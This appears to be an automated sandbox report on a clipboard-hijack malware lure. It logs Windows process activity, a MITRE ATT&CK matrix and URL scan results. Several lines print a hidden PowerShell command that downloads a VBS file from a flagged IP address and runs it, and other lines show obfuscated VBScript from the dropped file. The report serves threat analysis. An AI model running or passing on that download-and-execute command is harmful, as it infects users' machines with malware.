Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';"	Jump to behavior

Persistence and Installation Behavior

HTML page adds supicious text to clipboard

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Clipboard modification: powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualizao de ficheiro DOCx';"

Windows Shell Script Host drops VBS files

Source: C:\Windows\SysWOW64\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\5767.vbs

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3653			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6009			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4364	Thread sleep count: 3653 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1356	Thread sleep count: 6009 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5500	Thread sleep time: -23980767295822402s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2528	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Threadpool analyzer: Sleep duration: 300000ms

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: powershell.exe, 00000010.00000002.1529584097.0000000007C1C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
Source: wscript.exe, 00000011.00000002.3234447526.0000000008009000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ~DE\fLMbhKvMCIWOScxNvDqgxxkmFHlRWAfGxsZMQzfxXPElIA
Source: wscript.exe, 00000011.00000002.3230015955.00000000029B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \dWsyAKhfOAkOgpVMCIgHcproquISJuYDcJHFQMzIaeLgbjOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~
Source: wscript.exe, 00000011.00000003.1531184674.0000000006D26000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .fLMbhKvMCIWOScxNvDqgxxkmFHlRWAfGxsZMQzfxXPElIA\b
Source: 2539.vbs.16.dr	Binary or memory string: fLMbhKvMCIWOScxNvDqgxxkmFHlRWAfGxsZMQzfxXPElIA = sHjGnny0(79) + sHjGnny0(97) + sHjGnny0(99) + sHjGnny0(80) + sHjGnny0(72) + sHjGnny0(84) + sHjGnny0(100) + sHjGnny0(114) + sHjGnny0(115) + sHjGnny0(75) + sHjGnny0(80) + sHjGnny0(103) + sHjGnny0(105) + sHjGnny0(69) + sHjGnny0(83) + sHjGnny0(84) + sHjGnny0(71) + sHjGnny0(77) + sHjGnny0(110) + sHjGnny0(89) + sHjGnny0(88) + sHjGnny0(77) + sHjGnny0(70) + sHjGnny0(110) + sHjGnny0(109) + sHjGnny0(71) + sHjGnny0(112) + sHjGnny0(111) + sHjGnny0(103) + sHjGnny0(82) + sHjGnny0(104) + sHjGnny0(110) + sHjGnny0(109) + sHjGnny0(80) + sHjGnny0(114) + sHjGnny0(110) + sHjGnny0(110) + sHjGnny0(102) + sHjGnny0(82) + sHjGnny0(122) + sHjGnny0(108) + sHjGnny0(81) + sHjGnny0(77) + sHjGnny0(102)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';"			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2539.vbs"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	1 Exploitation for Client Execution	2 Browser Extensions	11 Process Injection	21 Virtualization/Sandbox Evasion	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 PowerShell	221 Scripting	1 DLL Side-Loading	11 Process Injection	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Source	Detection	Scanner	Label
https://ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com	0%	Avira URL Cloud	safe
https://ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com/CMiEZso	0%	Avira URL Cloud	safe
http://18.218	0%	Avira URL Cloud	safe
http://18.218.213.93/187.php	100%	Avira URL Cloud	malware
